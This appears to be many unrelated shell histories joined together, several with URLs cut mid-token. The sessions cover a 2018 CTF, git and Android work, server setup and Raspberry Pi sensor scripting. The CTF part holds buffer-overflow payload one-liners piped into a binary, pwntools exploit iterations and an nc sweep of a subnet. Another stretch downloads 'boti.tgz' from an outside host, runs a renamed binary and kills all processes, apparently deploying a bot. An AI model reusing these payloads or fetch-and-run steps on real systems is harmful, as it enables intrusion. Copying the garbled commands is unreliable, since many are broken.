Makefile.bak +make -f Makefile.bak +make -f Makefile.bak babymarvel2 +cp Makefile.bak Makefile +make +vim Makefile +ll +make +vim Makefile +make clean +make +vim Makefile +make +ll +ls -rlt +cp program.c program-printhex.c +vim Makefile +ll +vim Makefile +vim program-printhex.c +vim program2.c +make babymarvel-hex +ll +cat Makefile +make babymarvel-hex +vim Makefile +ls -lrt +cat Makefile +make babymarvel-hex +gcc program-printhex.c utils.c lobby.c users.c pastes.c -std=c99 -O1 -Wno-unused-result -Wno-format-security -o babymarvel-hex +ls -lrt +pwd +#ll /home/ctf/babymarv_orig/src/babymarvel-hex +grep 20001 * +ll +cat program2.c +cat /etc/passwd +su ctf_babymarvel +cat /etc/motd +ls +ls +ls +ls +cat wrapper.sh +./wrapper.sh +ps aux | grep wrapper +ls +ls +ls +ls +ls +cat /etc/xinetd.d/babymarvel +ls +ls +whoami +vi whoami +ls +ls +file x00 +ls -al +ps aux +vi program.c +telnet +nc localhost 20001 +nmap localhost +ifconfig +gcc +arp -a -n +ifconfig +ping +tmux +ls +w +vi .tmux.conf +tmux +exit +ls -lrt +ls -rlt +cat ./hack_the_planet.py +ps ax +lr +ls -lrt +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +cat program2.c +ll +mkdir goapsych0 +cp ../hack_the_planet.py ./ +ll +cp -a ../babymarv_orig/src/ babemarv +pwd +ll +vim program2.c +make +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +pwd +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +vim program2.c +cat Makefile +make babymarvel2 +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +vim program2.c +make babymarvel2 +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +vim program2.c +make babymarvel2 +vim program2.c +make babymarvel2 +./babymarvel2 1df91cd100ff86baf7a77457cbfb7c6bf276c54ec890b1ef5f00ae5a6ad7ffd2 +ll +vim utils.c +pwd +ls -lrta +pwd +ll +cat 1 +:q +ll +pwd +history +history | less +ls +ls +cat hack_the_planet.py +python hack_the_planet.py +/home/ctf/babymarv_orig/src/babymarvel-hex +ls +ls +ls +cat bla +cat password +ls +ls +ls +cat 946c79a541e2ab2ddb3fd581b8622303 +cat c +ls +ls +ls +/home/ctf/babymarv_orig/src/babymarvel-hex +pwd +cat ../../etc/passwd +/home/ctf/babymarv_orig/src/babymarvel-hex +ls +ls +ls +ls +ls -al +su ctf_babymarvel +ls +ls +ls +diff babymarvel whoami +ls +vi program.c +/home/ctf/babymarv_orig/src/babymarvel-hex +vi program.c +vi lobby.c +ls +ls -al +ls +ls +ls +cat wrapper.sh +ls +file fantasticiot +strings fantasticiot +strings fantasticiot | less +ls +./fantasticiot +./fantasticiot $(python -c 'print "A"*140 + "\x07\xd9\xff\xff"') +$(python -c 'print "A"*140 + "\x07\xd9\xff\xff"') | ./fantasticiot +python -c 'print "A"*140 + "\x07\xd9\xff\xff"' +python -c 'print "A"*140 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*1400 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*14000000000 + "\x07\xd9\xff\xff"' | ./fantasticiot +x +python -c 'print "A"*1400000 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*140000 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*14000 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*1400 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*5000 + "\x07\xd9\xff\xff"' | ./fantasticiot +python -c 'print "A"*5000' | ./fantasticiot +python -c 'print "A"*5030' | ./fantasticiot +python -c 'print "A"*2030' | ./fantasticiot +python -c 'print "A"*3030' | ./fantasticiot +python -c 'print "A"*2500' | ./fantasticiot +python -c 'print "A"*2200' | ./fantasticiot +python -c 'print "A"*2100' | ./fantasticiot +python -c 'print "A"*2000' | ./fantasticiot +python -c 'print "A"*2010' | ./fantasticiot +python -c 'print "A"*2020' | ./fantasticiot +python -c 'print "A"*2030' | ./fantasticiot +python -c 'print "A"*2040' | ./fantasticiot +python -c 'print "A"*2050' | ./fantasticiot +python -c 'print "A"*2049' | ./fantasticiot +python -c 'print "A"*2048' | ./fantasticiot +python -c 'print "A"*2049' | ./fantasticiot +ls +./fantasticiot +strings fantasticiot +strings fantasticiot | less +./fantasticiot +ls +ls -al +cat you_can_prepopulate_your_rw_dir +date +ls +ls +ls +ls -al +ls +ls +ls +cat wrapper.sh +strace ./fantasticiot +ls -strahl ../rw/flag/ +date +strace ./fantasticiot +ls -strahl ../rw/flag/ +ls -strahl ../rw/fridge/ +ls +gdb ./fantasticiot +objdump -d ./fantasticiot +objdump -d ./fantasticiot | less +gdb ./fantasticiot +ls +./fantasticiot +nm ./fantasticiot +nm ./fantasticiot | less +nm ./fantasticiot | grep flag | grep get +python -c 'print "A"*2048 + "\x55\x96\x04\x08"' | ./fantasticiot +w +who +date +tmux +w +ps ax +ls -lrt +cat list.txt +ls -lrt +cat program2.c +pip install pwn +ll +make +cat Makefile +ll +./babymarvel-hex +./babymarvel2 3225755ee35c56d1595de94680024c279f60ca9eefa1b22e5b6dcd8748c1cc5a +make +cat utils.c +ls +ls +tmux +ll +ls =-lrt +ll rw +ls -lrt +file venom +less venom +pwd +pwd +ll +ll +./babymarvel-hex +ll ../ +ll ../../ +vim utils.c +tcpdump port not 22 +tcpdump -vv port not 22 | tee tcpdump-01 +tcpdump -vv port not 22 +tcpdump -vv port not 22 | tee tcpdump-02 +# tcpdump -w - | tee somefile | tcpdump -r - +tcpdump -vv -w - port not 22 | tee tcpdump-03 | tcpdump -r +lr +ls -lr +ls -lrt +tcpdump -vv -w - port not 22 | tee tcpdump-03 +tcpdump =r + +tcpdump -r +tcpdump -r - +ls +ls +l +less wrapper.sh +less venom +ls +less venom +ls +less listener +less chromedriver +less listener +less chromedriver +r +ls +less wrapper.sh +ls +less venom +./venom +2 +ls +ps x +ls +cat /etc/xinetd.d/venom +ls +less venom +ls +less venom +ls +.. +ls +ls +less plan +ls +ls +ls +ls +ls +ls +ifconfig +ifconfig -a +exit +s +ps x +kill -9 5173 +tmux +lynx +apt-get install lynx +sudo apt-get install lynx +sudo root +ls -lrt +ls -lrt +ll ubuntu/ +ls -lrt +ls -lrt +mkdir tcpdumps +ps ax | grep tcpdump +tcpdump -h +ifconfig +man tcpdump +tcpdump tcp port 20004 +nohup tcpdump -v tcp port 20004 & +cat nohup.out +tail -f nohup.out +ln -s nohup.out tcpdump-port-20004 nohup.out +ll +ll tcpdumps/ +cat nohup.out +tail -f nohup.out +for((i=1; i<254; i++)) ; do nc -w 1 172.31.129.$i 20001 && echo "172.31.129.$i"; echo "------"; done +nc 20001 +pip install pwntools +ls +vi pwn.py +python pwn.py +vi pwn.py +python pwn.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +vi popel.py +python popel.py +nc 20001 +python popel.py +vi popel.py +python popel.py +vi popel.py +ifconfig +ls +ls +ls +cat wrapper.sh +ls +file venom +vi venom +pip install --user --upgrade pwntools +cat wrapper.sh cd +ls +cat popel.py +ls +vi pwn.py +python pwn.py +ls +rm pwn.pyc +rm popel.py +ls +python pwn.py +ls +rm pwn.pyc +ls +python -c 'from pwn import *; info("Hello")' +ls +rm pwn.py* +python -c 'from pwn import *; info("Hello")' +ls +mkdir ficken +ls +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +ls +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +ls +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +nc 20001 +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +python ficken.py +vi ficken.py +cp ficken2.py +cp ficken.py ficken2.py +ls +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +history +history | less +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +vi ficken2.py +python ficken2.py +/home/ctf/babymarv_orig/src/babymarvel-hex +vi ficken2.py +/home/ctf/babymarv_orig/src/babymarvel-hex +vi ficken2.py +/home/ctf/babymarv_orig/src/babymarvel-hex +vi ficken2.py +/home/ctf/babymarv_orig/src/babymarvel-hex +vi ficken2.py +ls +tar -cf 2018ictf.tar . +tar -cf /tmp/2018ictf.tar . +ls +rm 2018ictf.tar +tar -cf /tmp/2018ictf.tar . +mc +ls +tar -xvf 2018ictf.tar +ls +ls -al +ls -al +tar -cf /tmp/2018ictf.tar --owner=0 --group=0 . +ls +tar -cf /tmp/2018ictf.tar --owner=0 --group=0 . +tar -xvf 2018ictf.tar +tar -xvf 2018ictf.tar --no-same-permissions +mkdir trash +tar -xvf /tmp/2018ictf.tar +ls -al +jekyll new my-portfolio-site +jekyll new personal-website +ls +jekyll serve +jekyll cd +serve +jekyll serve +jakyll cd +jeykll cd +jekyll dc +jekyll cd +git add. +git add . +git init +git remote dd orginster/New-1 +git remote rm orgin +git remove rm Creeper +get remote add orginster/New-1 +git remote add orginster/New-1 +git remote rm origin +git remote add originster/New-1 +git remote -v +git add . +git commit -m "Save my work" +git push -u origin master +git push -u origin master +git push -u origin master +git push -u github.com master +git +git push +git push origin +git push origin master +git add . +git push -u origin master +git remote add originster/New-1.git +git remove rm origin +git +git rm +git rm +git rm -r +git rm -q +git rm q - +git rm personal-website +su - +wget piti.sufx.net/boti.tgz + tar xvf boti.tgz +mv bash lover +./lover +./lover +./lover +./lover +kill -9 -1 +kill -9 - +ps x +ping +su +newrole +ls +ls +ls +ls +tyls -M +color/? +4~4~ +exit +ls +ruby 2.classinstance.rb +2.classinstance.rb +2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +git init +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +exit +ls +ruby 2.classinstance.rb +ruby 2.classinstance.rb +echo $home +echo $HOME +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 2.classinstance.rb +ruby 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log +git checkout 1adb7f0884fd94d8822144dcdd4d33b125f904ad +git commit -a +git branch +git checkout master +git reset 1adb7f0884fd94d8822144dcdd4d33b125f904ad +git log +git commit -a +git reset --hard +git reset HEAD +git log +git pull +clear +ls +git rm -r src/ +git rm -r src +git rm -r res/ +clea +rls +clear +ls +ls -ltr +git log +git reset HEAD +git checkout master +git pull +git checkout master +git pull +git git clean -d -x -f +git clean -d -x -f +git rm -r src +clear +git log +git pull +git rm -r src +git rm -r res +git commit -a +git push +clear +ls +git clone +clear +ls +git pull +git log +rm -r NotreDev +sudo rm -r NotreDev +git clone +clear +ls +~/Documents/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb connect +vi ~/.bashrc +source ~/.bashrc +adb +clear +ls +git commit -a +git checkout AndroidManifest.xml +git commit -a +git checkout res/values/strings.xml +git checkout properties.properties +git commit -a +git checkout project.properties +git commit -a +clear +ls +git commit AndroidManifest.xml +git push +adb kill-server +adb tcpip +adb tcpip +adb +adb connect +git log +git push +git pull --rebase +git commit -a +git log +git push b03e4bbccb93233e4fe86719c5d32a823bbd203b +git pull --rebase +git log +git stash 7e8fa27acaad6d51b76d72c86b5184f7f348f1c3 +git stash +git checkout master +git log +clear +git push 7e8fa27acaad6d51b76d72c86b5184f7f348f1c3 +git push -h +git push origin 7e8fa27acaad6d51b76d72c86b5184f7f348f1c3:master +git log +clear +ls +git log +git branch +git checkout master +git log +git branch +git checkout master +git checkout SnakesOnAPlane/src/com/notredev/snakes/SnakeSurfaceView.java +git checkout src/com/notredev/snakes/SnakeSurfaceView.java +ls +git add src/com/notredev/snakes/SnakeSurfaceView.java +git commit -a +git checkout mainline +git reset --hard +git branch +git checkout mainline +git branch mainline +clear +ls +git log +clear +vi AndroidManifest.xml +clear +git pull --rebase +git branch +git checkout master +git pull --rebase +git rebase --abort +git pull --rebase +git reset --hard +git pull +git branch +git branch -D mainline +git checkout master +git pull +git checkout src/com/notredev/snakes/SnakeSurfaceView.java +vi src/com/notredev/snakes/SnakeSurfaceView.java +git add src/com/notredev/snakes/SnakeSurfaceView.java +vi AndroidManifest.xml +git pull +git commit -a +git pull +git checkout mainline +git checkout master +clear +ls +git log +git pull +git pull +git log +git checkout -h +git checkout 0b0f45469692e09a03c2e155cedfa0fbedcea32b src/com/notredev/snakes/SnakeSurfaceView.java +git checkout 0b0f45469692e09a03c2e155cedfa0fbedcea32b src/com/notredev/snakes/MainActivity.java +adb connect +git pull +git commit -a +git pull -rebase +git rebase -i +git rebase --abort +git rebase -i +git pull --rebase +git branch +git checkout master +git add src/com/notredev/snakes/SnakeSurfaceView.java +git checkout mainline +git checkout master +git commit -a +git checkout master +git pull --rebase +git rebase --abort +git pull --rebase +vi src/com/notredev/snakes/SnakeSurfaceView.java +git log +git checkout +git log +git branch +git checkout master +git commit -a +git checkout master +git pull --rebase +git reset --hard +git checkout master +git pull +ls +ls +rm -rf NotreDev/ +git clone +git pull --rebase +clear +ls +git pull +clear +ls +git commit -a +git pull +git commit -a +adb connect +git pull +git pull +adb kill-server +adb kill-server +adb kill-server +adb connect +git pull +git stash +git pull +adb kill-server +adb connect +adb kill-server +adb connect +adb connect +clear +ls +git commit -a +git reset --hard +adb connect +adb logcat +adb kill-server +adb connect +adb logcat +adb logcat +adb kill-server +adb connect +ls +clear +ls +git pull +git checkout src/com/notredev/snakes/SnakeSurfaceView.java +ls +git checkout src/com/notredev/snakes/SnakeSurfaceView.java +git pull +clear +ls +ls +build +ls +clear +ls +ls -ltr +clear +ls +./gradlew setupDecompWorkspace +./gradlew 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-rf Pig-Sword-Mod/asudo +sudo rm -rf Pig-Sword-Mod/ +ls +ls +./gradlew setupDecompWorkspace --refresh-dependencies +./gradlew setupDecompWorkspace --refresh-dependencies +sudo ./gradlew setupDecompWorkspace --refresh-dependencies +sudo ./gradlew setupDecompWorkspace --refresh-dependencies +sudo ./gradlew setupDecompWorkspace --refresh-dependencies +sudo ./gradlew eclipse +ls +ls eclipse/ +clear +ls +ls +clear +ls +mkdir Eclipse +git clonesquirlemaster42/Pig-Sword-Mod.git +clear +ls +ls +vi README.md +clear +ls +vi README.md +git pull +vi README.md +clear +ls +git clonesolarized.git +ls +mkdir -p ~/.pentadactyl/colors +ls +ls +cp solarized-*.penta ~/.pentadactyl/colors/. +vi ~/.pentadactylrc +vi ~/.pentadactylrc +clear +ls Applications/ +ls -ltr +clear +vi ~/.pentadactylrc +clear +ls +ls +mkdir dotfiles +clear +ls +git clones10wen/dotfiles.git +git clonesbynens/dotfiles.git +ls +mv dotfiles s10wen +sbynens/dotfiles.git +git clonesbynens/dotfiles.git +ls +mv dotfiles mathiasbynens +git clonesh/dotfiles.git +ls +mv dotfiles/ paulirish +clear +ls +ls +vi Caskfile +vi bin/bash +ls +ls +brew install tree +ls +clear +ls +vi Brewfile +brew +./bootstrap.sh +i bootstrap.sh +vi bootstrap.sh +clear +ls +l +sls +ls +ls +vi bin/spot +vi README.md +;s +ls +ls +ls * +;s +clear +ls +vi install-deps.sh +./install-deps.sh +clear +ls +ls ~ +./bootstrap.sh +clear +ls +vi ~ +ls ~ +ls -ltr ~ +ls -lta ~/ +vi ~/.vim +vi ~/.rnd +ls +z init +clear +ls +ls +ls +vi bootstrap.sh +clear +ls +git clones.git +mv dotfiles/ dotfiles-others +s.git +git clones.git +clear +ls +clear +ls +cp ~/dotfiles-others/s10wen/install-deps.sh +cp ~/dotfiles-others/s10wen/install-deps.sh . +ls +vi install-deps.sh +/usr/bin/bash +vi install-deps.sh +clear +ls +vi ~/dotfiles-others/s10wen/bootstrap.sh +clear +ls +echo $BASH_SOURCE +ls +vi ~/dotfiles-others/s10wen/bootstrap.sh +echo if cd repo; then git pull; else git cloneserver/repo repo; fi +vi ~/dotfiles-others/s10wen/bootstrap.sh +echo if cd repo; then git pull; else git cloneserver/repo repo; fi +echo ${BASH_SOURCE} +vi ~/dotfiles-others/s10wen/bootstrap.sh +clear +ls +vi install-deps.sh +mv install-deps.sh update-deps.sh +vi update-deps.sh +echo "# it_nihongo_myrepo" >> README.md +git init +git add README.md +git commit -m "first commit" +git config --global user.email "phamvietcuong2704@gmail.com" +git config --global user.name "vp1927" +git commit -m "first commit" +git remote add origin +git push origin master +git push -u origin master +git checkout -b "newRepo" + +passwd +ls +ls +ls +rm -r bmeswiki +ls +ls +chmod a+w config/ +ls -alh +ls +ls -alh +chmod a+w index.php +ls +ls -alh +ls +ls +ls +ls +ls -alh +ls +ls +ls +rm -r bmeswiki/ +pwd +ls +ls -alh +chmod a+w config +ls -alh +ls +ls -al +ls +ls +vi index.html +ls +ls +ls -al +rmdir cgi-bin/ +ls +ls +ls +exit +clear +ls +vi /etc/sysconfig/network-scripts/ifcfg-enp0s3 +systemctl restart network +ping google.com +clear +ip addr +clear +vi /etc/sysconfig/network-scripts/ifcfg-enp0s3 +clear +ping +systemctl restart network +ping google.com +clear +ls +yum update -y +clear +ping google.com +clear +l +clear +poweroff +clear +ls +passwd root +exit +clear +ls +vi /etc/sysconfig/network-scripts/ifcfg-enp0s3 +clear +service network restart +ping google.com +clear +ls +vi /etc/selinux/ +vi /etc/selinux/config +clear +ls +vi /etc/selinux/config +setenforce 0 +clear +exit +which docker +curl -fsSL get.docker.com|sh +sudo docker --version +sudo usermod -aG docker ubuntu +sudo usermod -aG docker D17126544 +sudo reboot +vim /etc/network/interfaces +sudo apt install vim* +vim /etc/network/interfaces +sudo apt install vim +sudo apt-get updatae +sudo apt-get update +vim /etc/network/interfaces +git cloneseok1/-Gazza +sudo apt install git +sudo adduser git +su git +sudo apt-get install git-core +git config --list +ls +git config --list +ls +./ssh +ls +ls +sudo mkdir /works +sudo git cloneseok1/noh.git +sudo git fetch origin +sudo git remote add originseok1/noh.git +git +ls +ls +ssh +minecra +mdns +sudo apt install mdns +sudo apt install avahi-daemon +sudo apt install libnss-mdns +ping grupo10.local +avahi-resolve +sudo apt install avahi-resolve +avahi-utils +avahi +avahi-daemon start +avahi-daemon +sudo avahi-daemon +sudo apt install bonjour +sudo apt update +sudo apt upgrade +sudo nano /etc/hosts +sudo nano /etc/hostname +sudo /etc/init.d/hostname.sh +ps +ps .. +ls .. +sudo reboot +sudo apt install realvnc-vnc-server realvnc-vnc-viewer +sudo raspi-config +if config; ipconfig; ifconfig; ifcofig +ifconfig +xit +close +shutdown +shutdown now +ifc +ifcomfig +ipconfig +ip config +ip help +ip address +sudo nano /etc/hosts +hostname +ping rpi12 +hostnamectl status +avahi/daemon +avahi-daemon +sudo avahi-daemon +sudo apt-get install avahi-daemon +sudo apt-get install avahi-daemon avahi-discover avahi-utils libnss-mdns mdns-scan +sudo reboot +sudo raspi-config +ip maddress +ifconfig +cat /etc/hostname +ps ax | grep avahi +sudo service avahi-daemon status +avahi-browse -a +sudo systemctl enable avahi-daemon +avahi-browse -a +avahi-resolve +sudo service avahi-daemon status +/etc/init.d/dbus +/etc/init.d/dbus start +/etc/init.d/avahi-daemon start +sudo service avahi-daemon status +tcpdump -i wlan0 port 5353 or igmp -w /tmp/mdns.pcap +avahi-resolve -n rpi12.local +sudo apt-get install avahi-dnsconf +sudo apt-get install avahi-dnsconfd +/etc/nsswitch.conf +sudo /etc/nsswitch.conf +service avahi-daemon status +service avahi-dnsconfd status +avahi-resolve -4 --name rpi12.local +sudo shutdown +ssh +ssh -L +sudo reboot +man gpio +gpio -v +ifconf +ifconfig +gpio readall +gpio -g mode 17 out +gpio readall +gpio write 17 1 +gpio readall +gpio write 17 0 +gpio readall +gpio write 17 1 +gpio readall +sudo shutdown +sudo shutdown -c +gpio -g write 17 1 +gpio -g write 17 0 +gpio -v +gpio -g write 17 1 +gpio -g write 17 0 +gpio readall +gpio 17 out +gpio -g mode 17 out +gpio -g write 17 1 +gpio -g write 17 0 +gpio -g mode 18 in && gpio -g mode 18 up +gpio -g read 18 +exit +shutdown now +shutdown +shutdown now +sudo shutdown now +ls +ls +sudo nano /etc/rc.local +file starttime.txt +touch starttime.txt +ls -l +touch savetime.sh +ls -l +nano savetime.sh +ls +chmod u+x savetime.sh +ls -l +sh ./savetime.sh +cat starttime.txt +nano starttime.txt +nano savetime.sh +sh ./savetime.sh +cat starttime.txt +date --help +nano savetime.sh +nano starttime.txt +sh ./savetime.sh +cat starttime.txt +nano starttime.txt +sudo nano /etc/rc.local +reboot +sudo reboot +cat starttime.txt +nano crontab -e +ls -l +sudo reboot +cat starttime.txt +crontab -e +cat starttime.txt +crontab -e +cat starttime.txt +htop +cat starttime.txt +sudo shutdown now +wait(5) +sleep(2) +sleep 2 +gpio -g mode 18 pwm +gpio -g readall +gpio -g mode out +gpio -g mode 18 out +gpio -g readall +gpio -g mode 18 pwm +gpio -g readall +gpio -g pwm 18 1023 +gpio -g pwm 18 0 +gpio -g pwm 18 500 +ls +bash fadingPWM.sh +vim fadingPWM.sh +nano fadingPWM.sh +bash fadingPWM.sh +vim fadingPWM.sh +nano fadingPWM.sh +vim fadingPWM.sh +bash fadingPWM.sh +nano fadingPWM.sh +bash fadingPWM.sh +cat fadingPWM.sh +ls +cat ldr +bash ldr +nano ldr +python ldr +cat ldr +python ldr +cat ldr +gpio -g readall +python ldr +cp ldr ldr2.0 +nano ldr2.0 +python ldr2.0 +rm ldr2.0 +python ldr +nano ldr +python ldr +./ldr +ls -l +chmode u+x ldr +chmode u+x ./ldr +chmod u+x ./ldr +./ldr +chmod u+x ./ldr +./ldr +python +$((3000*.0682)) +$((3000*0.0682)) +nano calculator.py +python -e 1+1 +python -c '1+1' +python -c 'return 1+1' +nano math_operator.py +python math_operator.py +gpio -g mode 7 pwm +echo $(python math_operator.py) +cat math_operator.py +nano math_operator.py +echo $(python math_operator.py) +nano math_operator.py +echo $(python math_operator.py) +uj=$(python math_operator.py) +echo $uj +nano math_operator.py +python math_operator.py 5 8 +nano math_operator.py +python math_operator.py 5 +nano math_operator.py +python math_operator.py 5 +python math_operator.py 5000 +nano math_operator.py +python math_operator.py 50000 +nano leerLuminosidad.sh +nano math_operator.py +bash leerLuminosidad.sh +nano math_operator.py +nano leerLuminosidad.sh +bash leerLuminosidad.sh +nano leerLuminosidad.sh +bash leerLuminosidad.sh +nano math_operator.py +bash leerLuminosidad.sh +nano leerLuminosidad.sh +gpio -g readall +gpio -g mode pwm 33 +gpio -g mode 33 pwm +nano leerLuminosidad.sh +gpio -g readall +bash leerLuminosidad.sh +gpio -g pwm 33 1023 +gpio -g readall +gpio -g mode 23 pwm +gpio -g readall +gpio -g mode pwm +gpio -g mode 33 pwm +gpio -g readall +gpio -g mode 18 pwm +gpio -g readall +gpio -g mode 13 pwm +gpio -g readall +gpio -g pwm 13 1023 +nano leerLuminosidad.sh +bash leerLuminosidad.sh + +bash leerLuminosidad.sh +nano math_operator.py +bash leerLuminosidad.sh +nano math_operator.py +bash leerLuminosidad.sh +shutdown now +sudo shutdown now +ls +exit +ps faux | grep sshd +kill -9 854 +sudo kill -9 854 +kill -9 854 +ps faux | grep sshd +sudo kill -1 426 +restart +ps -u bud +ps -u pi +sudo kill -1 867 +ifconfig +cat/etc/hostname +ls +cat/etc/hosts +cat /etc/hosts +cat /etc/hostname +cat /etc/services +sudo nano /etc/network/interfaces +sudo nano /etc/network/interfaces.d +sudo nano /etc/network/interfaces +ls +sudo nano /etc/network/interfaces +sudo nano /etc/dhcp.conf +sudo nano /etc/dhcpcd.conf +ip a +ifconfig wla0 inet up +ifconfig wlan0 inet up +sudo ifconfig wlan0 inet up +ip a +cat /etc/network/interfaces +cat /etc/dhcpcd.conf +cat /etc/network/interfaces +sudo ip wlan0 inet up +sudo ifconfig wlan0 up +ip a +wpa_supplicant +sudo nano /etc/network/interfaces +sudo nano /etc/wpa_supplicant/wpa_supplicant.conf +wpa_action +wpa_action wlan0 +man wpa_action +sudo ifup wlan0 +sudo ifdown wlan0 +wpa_action wlan0 start +man wpa_action +wpa_action wlan0 CONNECTED +SUDO wpa_action wlan0 CONNECTED +sudo wpa_action wlan0 CONNECTED +ip a +netstat -l +netstat -t +netstat -nltp +sudo shtdown now +sudo shutdown now +sudo reboot +mkdir testhttp +ls +wget www.deusto.es +ls +wget -r www.deusto.es +ls +curl +curl www.deusto.es +curl --request GET www.deusto.es +ls +curl -x GET www.deusto.es +sudo su +exit +curl -x GET www.deusto.es +curls +curl es.wikipedia.org +ls +curl es.wikipedia.org -v +curl --data "param1=value1¶m2=value2stname/resources +curls.stormconsultancy.co.uk/random.jason +curls.stormconsultancy.co.uk/random.json + +curlson.internetdelascosas.es/arduino/getlast.php -G -d data_name=temp -d nitems=10 +sudo apt-get install jq +curlson.internetdelascosas.es/arduino/getlast.php -G -d data_name=temp -d nitems=10 +curlson.internetdelascosas.es/arduino/getlast.php -G -d device_id=1 -d data_name=temp -d nitems=10 +valor=&(curlson.internetdelascosas.es/arduino/getlast.php -G -d device_id=1 -d data_name=temp -d nitems=1 | jq -r XXXXX) +valor=&(curlson.internetdelascosas.es/arduino/getlast.php -G -d device_id=1 -d data_name=temp -d nitems=1 | jq -r data_value) +valor=&(curlson.internetdelascosas.es/arduino/getlast.php -G -d device_id=1 -d data_name=temp -d nitems=1 | jq -raw-out) +echo $valor +sudo shutdown now +ls +nano leerLuminosidad.sh +nano ldr +gpio readall +gpio -g mode 18 pwm +gpio readall +./ldr +gpio -g mode 23 in && gpio -g mode 23 up +gpio readall +./ldr +gpio read 23 +gpio -g read 23 +cat /sys/class/thermal/thermal_zone0/temp +nano tepm +ls +nano temp +nano leerLuminosidad.sh +nano temp +chmod u+x temp +sh ./temp +sudo sh ./temp +nano temp +ls +sh ./temp +sudo sh ./temp +nano temp +sh ./temp +nano temp +sh ./temp +nano temp +sh ./temp +nano temp +cat /sys/class/thermal/thermal_zone0/temp +cat temp +nano temp +sh ./temp +nano temp +sh ./temp +nano temp +sh ./temp +nano temp +sh ./temp +sudo modprobe w1-gpio && sudo modprobe w1_therm +nano /etc/modules +sudo modprobe w1-gpio && sudo modprobe w1_therm +sudo nano /boot/config.txt +sudo reboot +ls -l /sys/bus/w1/devices/ +cat /sys/bus/w1/devices/28-00000996c252/w1_slave +nano tempsensor.py +sudo python tempsensor.py +sudo shutdown now +ls +nano fadingPWM.sh +nano temp +sh ./temp +nano leerLuminosidad.sh +sh ./leerLuminosidad.sh +nano leerLuminosidad.sh +python ldr +ls +python tempsensor.py +touch valpul +nano valpul +chmod u+x valpul +sh ./valpul +nano valpul +sh ./valpul +touch uploadData +nano uploadData +sudo shutdown now +ls +nano valpul +nano uploadData +nano leerLuminosidad.sh +nano temp +nano uploadData +nano leerLuminosidad.sh +nano uploadData +chmod u+v uploadData +chmod u+x uploadData +ls +sh ./uploadData +nano uploadData +sh ./uploadData +nano uploadData +sh ./uploadData +nano leerLuminosidad.sh +nano uploadData +sh ./uploadData +nano uploadData +sh ./uploadData +sudo halt +pip install requests +ls +ls +ls +echo id,nombre > fichero.csv +ls +echo 99,joseba >> fichero.csv +cat fichero.csv +sudo shutdown now +ls +nano temp +nano uploadData +sudo apt-get update +sudo apt-get install mosquitto +sudo apt-get install mosquitto-clients +sudo shutdown +sudo shutdown -c +sudo shutdown now +ls +nano uploadData +sudo pip install mqtt-paho +sudo pip install psutil +sudo pip install mqtt-paho +sudo pip install paho-mqtt +sudo pip3 install paho-mqtt +sudo pip3 install psutil +touch uploadInfo.py +ls +nano tempsensor.py +nano uploadData +nano uploadInfo.py +python tempsensor.py +nano uploadInfo.py +nano uploadData +nano uploadInfo.py +nano uploadData +nano uploadInfo.py +python uploadInfo.py +nano uploadInfo.py +python uploadInfo.py +nano uploadInfo.py +python uploadInfo.py +sudo -s +ls +dirname +dirname --help + +ls +dirname uploadInfo.py +dirname uploadInfo.py +ls +dirnamcde crontab +pwd +nano /etc/crontab +sudo -s nano /etc/crontab +/etc/crontab -l +sudo -s /etc/crontab -l +sudo -s nano /etc/crontab +crontab -e +sudo -s nano /etc/crontab +crontab -e +sudo nano /etc/rc.local +sudo shutdown now +ls +nano uploadData +python ldr +sudo shutdown now +python ldr +nano uploadInfo.py +sudo shutdown now +ls +python ldr +ls +nano uploadInfo.py +python ldr +touch luminosidad.py +nano luminosidad.py +ls +python luminosidad.py +git clone +ls +nano adc-code.py +sudo python adc-code.py +sudo pip install spidev +nano adc-code.py +ls +ls +nano luminosidad.py +python luminosidad.py +sudo raspi-config +sudo shutdown now +ls +python luminosidad.py +nano luminosidad.py +python luminosidad.py +nano uploadInfo.py +ls +nano 